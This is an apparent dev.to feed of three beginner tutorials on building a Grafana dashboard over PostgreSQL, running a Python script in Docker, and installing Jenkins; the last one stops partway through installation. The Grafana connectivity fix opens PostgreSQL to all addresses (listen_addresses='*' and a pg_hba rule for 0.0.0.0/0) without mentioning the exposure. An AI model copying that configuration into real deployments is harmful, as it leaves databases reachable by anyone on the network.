DEV Community: Sanjay Ghosh The latest articles on DEV Community by Sanjay Ghosh (@sanjayghosh). https://dev.to/sanjayghosh https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3733607%2F167b985e-e1fa-44ef-afd9-7e6c162a39fe.jpg DEV Community: Sanjay Ghosh https://dev.to/sanjayghosh en Grafana for Beginners: Build Your First Dashboard Using PostgreSQL and Docker Sanjay Ghosh Fri, 12 Jun 2026 04:41:57 +0000 https://dev.to/sanjayghosh/grafana-for-beginners-build-your-first-dashboard-using-postgresql-and-docker-2l4m https://dev.to/sanjayghosh/grafana-for-beginners-build-your-first-dashboard-using-postgresql-and-docker-2l4m <p>As I continue exploring the DevOps ecosystem, I wanted to understand how monitoring and observability tools fit into the software delivery lifecycle.</p> <p>Tools like Git, Jenkins, Docker, and Kubernetes are frequently discussed, but eventually every team reaches a common question:</p> <p><strong>How do we monitor what is happening after deployment?</strong></p> <p>That's where Grafana comes in.</p> <p>Grafana is one of the most popular open-source visualization platforms used by development, operations, and Site Reliability Engineering (SRE) teams. It helps transform raw metrics into meaningful dashboards that provide insights into application performance, infrastructure health, and business metrics.</p> <p>In this article, we'll build a complete working example from scratch:</p> <ul> <li>Install Grafana using Docker</li> <li>Create a PostgreSQL database</li> <li>Insert sample metrics</li> <li>Connect Grafana to PostgreSQL</li> <li>Build a dashboard</li> <li>Troubleshoot common connection issues</li> </ul> <p>By the end, you'll have a fully functional Grafana dashboard running locally and a solid understanding of how Grafana fits into modern DevOps workflows.</p> <h2> What is Grafana? </h2> <p>Grafana is an open-source monitoring and visualization platform.</p> <p>It connects to various data sources and transforms raw data into interactive dashboards and alerts.</p> <p>Grafana itself does not store monitoring data. Instead, it reads data from external systems such as:</p> <ul> <li>PostgreSQL</li> <li>MySQL</li> <li>Prometheus</li> <li>Elasticsearch</li> <li>Loki</li> <li>AWS CloudWatch</li> <li>InfluxDB</li> </ul> <p>A simplified architecture looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Database / Monitoring Tool | v Grafana | v Dashboards | v Alerts </code></pre> </div> <h2> Where Grafana Fits in DevOps </h2> <p>Grafana is used throughout the DevOps lifecycle.</p> <h3> Development </h3> <ul> <li>Performance analysis</li> <li>Debugging bottlenecks</li> <li>Resource utilization monitoring</li> </ul> <h3> Testing </h3> <ul> <li>Monitor test environments</li> <li>Validate application behavior</li> </ul> <h3> CI/CD </h3> <ul> <li>Monitor deployments</li> <li>Track build success rates</li> <li>Visualize pipeline metrics</li> </ul> <h3> Production </h3> <ul> <li>Infrastructure monitoring</li> <li>Application Performance Monitoring (APM)</li> <li>Alerting and incident management</li> </ul> <h2> Step 1: Install Grafana Using Docker </h2> <p>Pull the Grafana image:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker pull grafana/grafana </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker images </code></pre> </div> <p>Run Grafana:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">-d</span> <span class="se">\</span> <span class="nt">--name</span> grafana <span class="se">\</span> <span class="nt">-p</span> 3000:3000 <span class="se">\</span> grafana/grafana </code></pre> </div> <p>Verify the container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker ps </code></pre> </div> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>0.0.0.0:3000-&gt;3000/tcp </code></pre> </div> <p>Open:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>http://localhost:3000 </code></pre> </div> <p>Default credentials:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Username: admin Password: admin </code></pre> </div> <p>Grafana will prompt you to change the password during the first login.</p> <p>Screenshot of login:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fehvpxsz4c1l68pojduoa.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fehvpxsz4c1l68pojduoa.jpg" alt=" " width="756" height="407"></a></p> <h2> Step 2: Create a PostgreSQL Database </h2> <p>Create a database:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">DATABASE</span> <span class="n">grafana_demo</span><span class="p">;</span> </code></pre> </div> <p>Connect:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="err">\</span><span class="k">c</span> <span class="n">grafana_demo</span> </code></pre> </div> <p>Create a table:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">system_metrics</span> <span class="p">(</span> <span class="n">id</span> <span class="nb">SERIAL</span> <span class="k">PRIMARY</span> <span class="k">KEY</span><span class="p">,</span> <span class="n">metric_time</span> <span class="nb">TIMESTAMP</span><span class="p">,</span> <span class="n">cpu_usage</span> <span class="nb">NUMERIC</span><span class="p">(</span><span class="mi">5</span><span class="p">,</span><span class="mi">2</span><span class="p">)</span> <span class="p">);</span> </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="err">\</span><span class="n">d</span> <span class="n">system_metrics</span> </code></pre> </div> <h2> Step 3: Insert Sample Metrics </h2> <p>Insert some sample CPU usage data:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">INSERT</span> <span class="k">INTO</span> <span class="n">system_metrics</span><span class="p">(</span><span class="n">metric_time</span><span class="p">,</span> <span class="n">cpu_usage</span><span class="p">)</span> <span class="k">VALUES</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'9 minutes'</span><span class="p">,</span><span class="mi">15</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'8 minutes'</span><span class="p">,</span><span class="mi">18</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'7 minutes'</span><span class="p">,</span><span class="mi">25</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'6 minutes'</span><span class="p">,</span><span class="mi">30</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'5 minutes'</span><span class="p">,</span><span class="mi">45</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'4 minutes'</span><span class="p">,</span><span class="mi">50</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'3 minutes'</span><span class="p">,</span><span class="mi">42</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'2 minutes'</span><span class="p">,</span><span class="mi">55</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">()</span> <span class="o">-</span> <span class="n">INTERVAL</span> <span class="s1">'1 minute'</span><span class="p">,</span><span class="mi">60</span><span class="p">),</span> <span class="p">(</span><span class="n">NOW</span><span class="p">(),</span><span class="mi">48</span><span class="p">);</span> </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">system_metrics</span><span class="p">;</span> </code></pre> </div> <h2> Step 4: Connect Grafana to PostgreSQL </h2> <p>Navigate to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>http://localhost:3000/datasources </code></pre> </div> <p>Choose:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>PostgreSQL </code></pre> </div> <p>Use:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Host: host.docker.internal:5432 Database: grafana_demo User: postgres Password: your_password </code></pre> </div> <p>Save and test the connection.</p> <p>Screenshot of connection:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2s0qodl9fei5r3h6ox2r.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2s0qodl9fei5r3h6ox2r.jpg" alt=" " width="800" height="337"></a></p> <h2> Step 5: Create Your First Dashboard </h2> <p>Navigate to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Dashboards → New Dashboard → Add Visualization </code></pre> </div> <p>Select your PostgreSQL data source.</p> <p>Switch to <strong>Code Mode</strong> and execute:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">metric_time</span> <span class="k">AS</span> <span class="nv">"time"</span><span class="p">,</span> <span class="n">cpu_usage</span> <span class="k">AS</span> <span class="n">value</span> <span class="k">FROM</span> <span class="n">system_metrics</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="n">metric_time</span><span class="p">;</span> </code></pre> </div> <p>Click:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Run Query </code></pre> </div> <p>Grafana automatically plots the data.</p> <p>Screenshot of graph:<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzxajm2hzoso4zfmq2n9.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frzxajm2hzoso4zfmq2n9.jpg" alt=" " width="799" height="368"></a></p> <h2> Common Connection Problem </h2> <p>One of the most common errors is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Network error: Failed to connect to the server </code></pre> </div> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>dial tcp: lookup host.docker.internal: no such host </code></pre> </div> <h3> Verify PostgreSQL Settings </h3> <p>Check:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SHOW</span> <span class="n">listen_addresses</span><span class="p">;</span> <span class="k">SHOW</span> <span class="n">port</span><span class="p">;</span> </code></pre> </div> <p>You may see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>listen_addresses = localhost </code></pre> </div> <p>This means PostgreSQL only accepts local connections.</p> <p>Grafana running inside Docker cannot reach it.</p> <h2> Fix PostgreSQL Connectivity </h2> <p>Locate the configuration file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-u</span> postgres psql <span class="nt">-c</span> <span class="s2">"SHOW config_file;"</span> </code></pre> </div> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/etc/postgresql/16/main/postgresql.conf </code></pre> </div> <p>Modify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>listen_addresses='*' </code></pre> </div> <p>Update:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/etc/postgresql/16/main/pg_hba.conf </code></pre> </div> <p>Add:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>host all all 0.0.0.0/0 scram-sha-256 </code></pre> </div> <p>Restart PostgreSQL:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl restart postgresql </code></pre> </div> <p>Or:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>service postgresql restart </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SHOW</span> <span class="n">listen_addresses</span><span class="p">;</span> </code></pre> </div> <p>Expected:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>* </code></pre> </div> <h2> Find the Host IP Address </h2> <p>If <code>host.docker.internal</code> does not work:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">hostname</span> <span class="nt">-I</span> </code></pre> </div> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>172.21.xxx.xxx </code></pre> </div> <p>Use that IP address as the Grafana host connection.</p> <h2> Grafana vs Prometheus </h2> <p>A common beginner question is:</p> <blockquote> <p>Do I need Prometheus?</p> </blockquote> <p>The answer depends on your use case.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Prometheus ----------- Collects Metrics Grafana -------- Visualizes Metrics </code></pre> </div> <p>Prometheus and Grafana are frequently used together.</p> <h2> Grafana + Jenkins </h2> <p>Grafana can also monitor Jenkins pipelines when combined with Prometheus exporters.</p> <h2> Learning Path </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Install Grafana | v Connect Data Source | v Run Queries | v Create Dashboard | v Create Alerts | v Production Monitoring </code></pre> </div> <h2> Final Thoughts </h2> <p>Grafana is one of the most valuable tools in the modern DevOps ecosystem because it turns raw operational data into actionable insights.</p> <p>Even with a simple PostgreSQL database and a handful of records, we can create meaningful visualizations and begin understanding trends, performance characteristics, and system behavior.</p> <p>In real-world environments, Grafana is often integrated with:</p> <ul> <li>Prometheus for metrics collection</li> <li>Jenkins for CI/CD monitoring</li> <li>Docker and Kubernetes for container monitoring</li> <li>Loki for centralized logging</li> <li>Cloud platforms such as AWS, Azure, and Google Cloud</li> </ul> <p>This article focused on the fundamentals using PostgreSQL because it provides an easy way to understand how Grafana connects to a data source and transforms query results into visual dashboards.</p> <p>Once you're comfortable with this setup, the next logical steps are:</p> <ul> <li>Grafana + Prometheus</li> <li>Grafana + Jenkins</li> <li>Grafana + Docker Metrics</li> <li>Grafana + Kubernetes</li> <li>Grafana + Loki</li> </ul> <p>Those integrations unlock the full power of observability and provide the continuous feedback loop that modern DevOps teams depend on.</p> <p>I hope this walkthrough helps you build your first Grafana dashboard and serves as a foundation for deeper monitoring and observability projects.</p> Understanding Docker Using a Tiny Python Application (A Beginner-Friendly Walkthrough) Sanjay Ghosh Sun, 07 Jun 2026 18:46:39 +0000 https://dev.to/sanjayghosh/understanding-docker-using-a-tiny-python-application-a-beginner-friendly-walkthrough-3232 https://dev.to/sanjayghosh/understanding-docker-using-a-tiny-python-application-a-beginner-friendly-walkthrough-3232 <p>Many Docker tutorials immediately introduce Docker Compose, Kubernetes, networking, volumes, and multi-container applications.</p> <p>For beginners, that can feel overwhelming.</p> <p>In this article, we'll build a very small Docker image that runs a simple Python script. The goal is to understand the core Docker concepts before moving on to more advanced containerization topics.</p> <p>By the end of this tutorial, you'll understand:</p> <ul> <li>What Docker is</li> <li>What a container is</li> <li>How Docker images work</li> <li>How to build an image</li> <li>How to run a container</li> <li>The difference between an image and a container</li> </ul> <h2> Why Docker? </h2> <p>One common problem in software development is:</p> <blockquote> <p>"It works on my machine."</p> </blockquote> <p>An application may work perfectly on a developer's computer but fail on another machine because of missing libraries, different operating systems, or incompatible software versions.</p> <p>Docker solves this problem by packaging:</p> <ul> <li>Application code</li> <li>Runtime</li> <li>Libraries</li> <li>Dependencies</li> <li>Configuration</li> </ul> <p>into a single portable unit called a container.</p> <p>As long as Docker is installed, the application can run consistently across environments.</p> <h2> Docker in Simple Terms </h2> <p>A useful analogy is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Docker Image = Blueprint Docker Container = House Built From The Blueprint </code></pre> </div> <p>An image is a template.</p> <p>A container is a running instance created from that image.</p> <p>You can create multiple containers from the same image.</p> <h2> Installing Docker on Ubuntu </h2> <p>Update package information:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt update </code></pre> </div> <p>Install Docker:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt <span class="nb">install </span>docker.io </code></pre> </div> <p>Verify the installation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>docker run hello-world </code></pre> </div> <p>You should see a welcome message from Docker.</p> <h2> Running Docker Without sudo </h2> <p>Add your user to the Docker group:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>usermod <span class="nt">-aG</span> docker <span class="nv">$USER</span> </code></pre> </div> <p>Log out and log back in.</p> <p>Now Docker commands can be executed without <code>sudo</code>.</p> <h2> Environment </h2> <p>The following environment was used:</p> <p>Ubuntu 24.04 LTS<br> Docker 29.1.3<br> Python 3.x</p> <h2> Project Structure </h2> <p>docker-python-app/<br> │<br> ├── test.py<br> └── Dockerfile</p> <h2> Our Tiny Python Application </h2> <p>Create:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>test.py </code></pre> </div> <p>Contents:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">This is a test</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <p>Normally, the script can be executed using:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 test.py </code></pre> </div> <p>Now we'll run the same application inside a Docker container.</p> <h2> Creating a Dockerfile </h2> <p>Create a file named:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Dockerfile </code></pre> </div> <p>Contents:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="s"> ubuntu:latest</span> <span class="k">WORKDIR</span><span class="s"> /docker-apps</span> <span class="k">COPY</span><span class="s"> ./test.py .</span> <span class="k">RUN </span>apt update <span class="o">&amp;&amp;</span> apt <span class="nb">install </span>python3 <span class="nt">-y</span> <span class="k">CMD</span><span class="s"> ["python3", "./test.py"]</span> </code></pre> </div> <p>Docker builds images layer by layer by processing each instruction in the Dockerfile from top to bottom.</p> <p>Let's understand each instruction.</p> <h3> FROM </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">FROM</span><span class="s"> ubuntu:latest</span> </code></pre> </div> <p>Uses Ubuntu as the base image.</p> <h3> WORKDIR </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">WORKDIR</span><span class="s"> /docker-apps</span> </code></pre> </div> <p>Sets the working directory inside the container.</p> <h3> COPY </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">COPY</span><span class="s"> ./test.py .</span> </code></pre> </div> <p>Copies the Python script into the container.</p> <h3> RUN </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">RUN </span>apt update <span class="o">&amp;&amp;</span> apt <span class="nb">install </span>python3 <span class="nt">-y</span> </code></pre> </div> <p>Installs Python inside the image.</p> <h3> CMD </h3> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="k">CMD</span><span class="s"> ["python3", "./test.py"]</span> </code></pre> </div> <p>Specifies the command executed when the container starts.</p> <h2> Building the Docker Image </h2> <p>Build the image:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker build <span class="nt">-t</span> ubuntu-python <span class="nb">.</span> </code></pre> </div> <p>Docker reads the Dockerfile and creates an image named:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ubuntu-python </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker images </code></pre> </div> <p>You should see the newly created image.</p> <h2> Running the Container </h2> <p>Create and start a container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">-it</span> <span class="nt">-d</span> <span class="nt">--name</span> test-container ubuntu-python </code></pre> </div> <p>Verify:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker ps <span class="nt">-a</span> </code></pre> </div> <p>View container logs:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker logs test-container </code></pre> </div> <p>Expected output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>This is a test </code></pre> </div> <p>Congratulations! You have successfully executed a Python application inside a Docker container.</p> <p>Screenshot<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4r898i0u1gml3ha7tbj5.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4r898i0u1gml3ha7tbj5.jpg" alt=" " width="799" height="276"></a></p> <h2> Docker Workflow </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>test.py ↓ Dockerfile ↓ docker build ↓ Docker Image ↓ docker run ↓ Docker Container ↓ This is a test </code></pre> </div> <p>This same workflow is used for much larger applications.</p> <h2> Image vs Container </h2> <p>One of the most important Docker concepts is understanding the difference between an image and a container.</p> <h3> Image </h3> <p>An image is:</p> <ul> <li>Read-only</li> <li>A template</li> <li>Used to create containers</li> </ul> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>ubuntu-python </code></pre> </div> <h3> Container </h3> <p>A container is:</p> <ul> <li>Running or stopped</li> <li>Created from an image</li> <li>The actual execution environment</li> </ul> <p>Example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>test-container </code></pre> </div> <p>A single image can create many containers.</p> <h2> Useful Docker Commands </h2> <p>Stop a container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker stop &lt;container_name_or_id&gt; </code></pre> </div> <p>Remove a container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker <span class="nb">rm</span> &lt;container_name_or_id&gt; </code></pre> </div> <p>Force remove a container:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker <span class="nb">rm</span> <span class="nt">-f</span> &lt;container_name_or_id&gt; </code></pre> </div> <p>Remove all stopped containers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker container prune </code></pre> </div> <p>List images:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker images </code></pre> </div> <p>List containers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker ps <span class="nt">-a</span> </code></pre> </div> <h2> The Most Important Lesson </h2> <p>One of the biggest misconceptions among beginners is that Docker is a virtual machine.</p> <p>It is not.</p> <p>Containers share the host operating system kernel, making them much lighter and faster than traditional virtual machines.</p> <p>Docker packages applications and their dependencies in a portable and isolated way without requiring a full guest operating system.</p> <p>Understanding this distinction is one of the key concepts in containerization.</p> <p>💡 Key Takeaway<br> Docker does not replace your application.</p> <p>Docker packages your application together with its runtime and dependencies so it can run consistently across different environments.</p> <p>Understanding the difference between an image and a container is one of the most important Docker concepts.</p> <h2> Future Enhancements </h2> <p>Once comfortable with this example, you can explore:</p> <ul> <li>Docker volumes</li> <li>Docker networking</li> <li>Docker Compose</li> <li>Multi-container applications</li> <li>Docker Hub</li> <li>Jenkins + Docker integration</li> <li>Kubernetes</li> </ul> <p>The concepts learned in this article form the foundation for all of them.</p> <h2> Final Thoughts </h2> <p>Docker can seem intimidating when first encountered through large production deployments.</p> <p>Starting with a tiny application makes the learning process much easier.</p> <p>A simple Python script is enough to understand:</p> <ul> <li>Images</li> <li>Containers</li> <li>Dockerfiles</li> <li>Build process</li> <li>Container execution</li> </ul> <p>Once these fundamentals become clear, moving toward real-world containerized applications becomes much more natural.</p> <p>If you're new to Docker, try building this example yourself before moving on to Docker Compose, Kubernetes, or cloud deployments. The concepts learned here will transfer directly to larger containerized systems.</p> docker devops python beginners Understanding Jenkins CI/CD Using a Tiny Java Project (A Beginner-Friendly Walkthrough) Sanjay Ghosh Mon, 01 Jun 2026 04:13:19 +0000 https://dev.to/sanjayghosh/understanding-jenkins-cicd-using-a-tiny-java-project-a-beginner-friendly-walkthrough-6co https://dev.to/sanjayghosh/understanding-jenkins-cicd-using-a-tiny-java-project-a-beginner-friendly-walkthrough-6co <h2> Understanding Jenkins CI/CD Using a Tiny Java Project </h2> <p>Most Jenkins tutorials immediately jump into Docker, Kubernetes, Maven, cloud deployments, and enterprise-scale architectures.</p> <p>For someone learning CI/CD for the first time, that can become overwhelming very quickly.</p> <p>In this article, we'll build a very lightweight but real Jenkins pipeline using a simple Java application. The goal is to understand how Jenkins works behind the scenes before introducing more advanced DevOps tools.</p> <p>This example demonstrates:</p> <ul> <li>Pipeline stages</li> <li>Compilation</li> <li>Program execution</li> <li>Artifact generation</li> <li>Artifact archiving</li> <li>Jenkins workspace concepts</li> <li>Console output debugging</li> </ul> <p>without introducing unnecessary complexity.</p> <h2> Why This Example? </h2> <p>Whether you're building:</p> <ul> <li>A Java application</li> <li>A Spring Boot service</li> <li>A Docker image</li> <li>A Kubernetes deployment</li> </ul> <p>the fundamental Jenkins workflow remains largely the same:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Source Code ↓ Build ↓ Test ↓ Package ↓ Deploy </code></pre> </div> <h2> Understanding this flow first makes learning advanced CI/CD concepts much easier. </h2> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjllzs3qj4yxmbfx6vztl.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjllzs3qj4yxmbfx6vztl.png" alt=" " width="800" height="1200"></a><br> Figure 1: Simplified Jenkins CI/CD flow used throughout this tutorial.</p> <h2> Environment </h2> <p>The following environment was used:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Ubuntu 24.04 LTS OpenJDK 17 Git Jenkins </code></pre> </div> <h2> Jenkins Installation </h2> <p>Before creating Jenkins pipelines, Jenkins must be installed on the system.</p> <p>Since Jenkins runs on Java, Java must be installed first.</p> <h3> Update Package Information </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt update </code></pre> </div> <h3> Verify Java Installation </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>java <span class="nt">-version</span> </code></pre> </div> <p>If Java is not installed:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt <span class="nb">install </span>openjdk-17-jdk </code></pre> </div> <p>Verify Java again:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>java <span class="nt">-version</span> </code></pre> </div> <h3> Add Jenkins Repository Key </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-fsSL</span> https://pkg.jenkins.io/debian-stable/jenkins.io-2023.key | <span class="nb">sudo tee</span> <span class="se">\</span> /usr/share/keyrings/jenkins-keyring.asc <span class="o">&gt;</span> /dev/null </code></pre> </div> <h3> Add Jenkins Repository </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo </span>deb <span class="o">[</span>signed-by<span class="o">=</span>/usr/share/keyrings/jenkins-keyring.asc] <span class="se">\</span> https://pkg.jenkins.io/debian-stable binary/ | <span class="nb">sudo tee</span> <span class="se">\</span> /etc/apt/sources.list.d/jenkins.list <span class="o">&gt;</span> /dev/null </code></pre> </div> <h3> Update Package Information Again </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt update </code></pre> </div> <h3> Install Jenkins </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt <span class="nb">install </span>jenkins </code></pre> </div> <h3> Start Jenkins Service </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl start jenkins </code></pre> </div> <h3> Enable Jenkins at Startup </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl <span class="nb">enable </span>jenkins </code></pre> </div> <h3> Verify Jenkins Status </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl status jenkins </code></pre> </div> <h3> Open Jenkins in Browser </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>http://localhost:8080 </code></pre> </div> <p>During the first login, Jenkins requests an administrator password.</p> <p>Retrieve it using:<br> </p> <div class="highlight js-code-highlight"> 